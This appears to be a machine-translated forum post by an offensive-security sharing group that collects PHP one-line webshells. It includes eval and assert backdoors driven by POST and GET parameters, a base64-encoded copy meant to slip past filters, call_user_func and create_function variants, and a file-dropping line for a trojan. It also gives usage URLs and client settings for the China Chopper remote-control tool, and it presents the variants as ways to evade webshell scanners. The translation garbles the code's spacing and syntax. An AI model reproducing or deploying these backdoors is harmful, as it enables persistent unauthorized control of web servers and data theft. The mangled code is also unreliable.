Php method of making a dirty stream in one sentence

Eval blocking is often encountered during penetration, so
<? Php eval ($ _ POST [xiao])?> This form will be intercepted
It is common to become
Base64_decode (PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4 =)
This form can be bypassed, and there are other forms
 
<? Php $ _ GET ['eval'] ($ _ POST ['xiao']);?>
 
 
 
Today, I saw something strange: web anti-virus. V1.0. Point. I wonder if anyone is involved with the cloud.
 
This is a webshell scanning tool. Some of my predecessors have used web backdoors to survive. They are afraid of discovery, compression, encryption, character reversal, and a single sentence.
 
Some time ago, the cnqing blog also sent one:
 
Many people have discussed it, and some people feel the same as me. php backdoors are hard to prevent. In fact, the key lies in rules. Proactive scanning also follows the established rules.
 
I also sent one, which belongs to the wretched stream.
 
If (key ($ _ GET) = 'singyea ') call_user_func ($ _ GET ['singyea'], $ _ POST ['singyea ']);
 
Okay. Usage:
 
Http://www.bkjia.com/shell. php? Singyea = assert
 
Client kitchen knife
 
<? Php $ _ GET ['a'] ($ _ POST ['B']);?>
Test. php? A = assert
Password B
 
<? Php assert ($ _ POST [s]);?>
 
<? Php $ _ POST ['iso '] ($ _ POST ['cmd']);?>
 
Enter the password cmd kitchen knife configuration information: <O> iso = assert </O>
 
<? Php
$ S = create_function ('', $ _ REQUEST ['C']);
$ S ();
// S. php? C = eval % 28 $ _ REQUEST [cmd] % 29; & cmd = echo % 201;
?>
 
<? Php file_put_contents (base64_decode (file name), base64_decode (pony base64);?>
 
Not explained



Author: rootc4 Free sharing Group